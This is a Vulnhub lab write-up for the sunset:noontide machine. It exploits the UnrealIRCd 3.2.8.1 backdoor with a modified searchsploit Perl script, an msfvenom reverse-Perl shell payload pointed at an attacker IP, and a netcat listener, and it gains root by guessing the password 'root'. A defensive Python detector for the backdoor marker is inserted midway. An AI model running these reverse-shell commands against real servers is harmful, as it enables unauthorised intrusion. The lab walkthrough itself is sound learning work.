Sunset:noontide | [Vulnhub write-up]
After a long time Vulnhub uploaded new VMs. Two new VMs came from the sunset series, “noontide” and “Sundown”. They are pretty easy; even the description mentions “Very easy, do not overthink it!”. So let's start with nmap, as usual :)
I found an IRC (Internet Relay Chat) port. IRC is an application layer protocol that facilitates communication in the form of text. The chat process works on a client/server networking model.
We have the IRC version (Unreal 3.2.8.1). I looked in searchsploit and found 3 direct hits.
searchsploit unreal ircd 3.2.8.1
- For Metasploit, written in Ruby.
- For Windows, which can be used to DoS the service.
- Remote Downloader, written in Perl.
Here we will use the third one, so I copied the 13853.pl file into the current directory. Now we have to generate our own payload with msfvenom.
msfvenom -p cmd/unix/reverse_perl LHOST=<attacker_IP> LPORT=4000 -f raw
Copy this payload, then open the 13853.pl file in a text editor (nano works too). You will see there are 5 payloads in total; clear all the payloads except payload 1.
You will see “my $payload1 = 'AB; BLAH! BLAH! BLAH!”...
Paste the payload you copied earlier after “'AB; ” and delete whatever was written there before. Your script should look like this!
Remember that after -e you have to put “\”, and at the end of the line also, before the single quote (').
Now just run this Perl file and start listening with netcat.
perl 13853.pl <VICTIM’S_IP> 6667 1
Here I use 1 because we want to run payload 1; we have to specify it. Now start netcat in a second terminal.
nc -lvp 4000
Okay, we got a shell! To get a proper shell, run this Python command:
python -c 'import pty;pty.spawn("/bin/bash")'
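From the defender's side, the “AB;” prefix that starts the payload is easy to spot on the wire, because it is not a valid IRC command. The following is an added example, not part of the original write-up or of 13853.pl, that flags such lines in reassembled client-to-server traffic; the record format, the sample lines and the function names are assumptions.

```python
import re

# Per the IRC message grammar (RFC 1459), a client line is an optional
# ":prefix " followed by a command that is letters only or exactly 3 digits.
VALID_COMMAND = re.compile(r"^(?::\S+ +)?(?:[A-Za-z]+|\d{3})(?: |$)")
# Marker that starts the exploit payload shown in this write-up.
BACKDOOR_MARKER = "AB;"


def classify(line):
    """Return 'backdoor-marker', 'malformed' or 'ok' for one client line."""
    text = line.rstrip("\r\n")
    if text.startswith(BACKDOOR_MARKER):
        return "backdoor-marker"
    if text and not VALID_COMMAND.match(text):
        return "malformed"
    return "ok"


def scan(records):
    """records: iterable of (source_ip, raw_line); returns a list of alerts."""
    alerts = []
    for src, raw in records:
        verdict = classify(raw)
        if verdict != "ok":
            # Truncate the evidence so an alert never carries a full payload.
            alerts.append((src, verdict, raw.rstrip("\r\n")[:80]))
    return alerts


# Constructed sample: lines as reassembled from a capture on 6667/tcp.
SAMPLE = [
    ("192.0.2.10", "NICK alice\r\n"),
    ("192.0.2.10", "USER alice 0 * :Alice\r\n"),
    ("192.0.2.10", ":alice PRIVMSG #chat :hello\r\n"),
    ("198.51.100.7", "AB; <shell command elided>\r\n"),
    ("198.51.100.7", "\x00\x01garbage\r\n"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

A hit on the marker means the server should be treated as compromised and the ircd binary replaced from a verified source.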
Now you will find local.txt easily by going to /home/server... but what about ROOT?
Here the description will help us find out how to get a root shell! The description said “Very easy, do not overthink it!”, so I tried the password “root” for root.
And BOOM!
You wouldn't believe it... I tried so many things, LinEnum.sh and finding SUID files.. xD xD xD... then I read the description again and thought: what if I use root:root? Then I got it xD xD xD
By the way, this VM is easy, but I didn't know about the IRC port, so I just googled it first and got enough knowledge, like: What is IRC? Why is it used? How can we connect to it? How can we exploit it?
So, I learned a new thing about IRC... it's GOOD!
Next! sunset:sundown write-up is in the queue ;)
Until then, *HAPPY HACKING!*